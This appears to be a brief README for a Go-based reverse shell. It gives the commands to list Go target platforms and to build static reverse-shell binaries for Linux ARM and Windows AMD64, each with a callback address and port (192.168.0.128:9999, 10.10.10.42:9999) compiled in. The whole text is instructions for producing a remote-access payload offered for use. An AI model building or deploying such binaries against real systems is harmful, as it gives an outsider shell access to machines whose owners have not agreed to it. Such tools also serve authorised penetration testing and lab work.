A reverse shell that can be compiled to all architectures supported by Go.
List supported platforms.
go tool dist list
Compile static binary.
./build.sh GOARCH=arm GOOS=linux TARGET=192.168.0.128:9999
./build.sh GOARCH=amd64 GOOS=windows TARGET=10.10.10.42:9999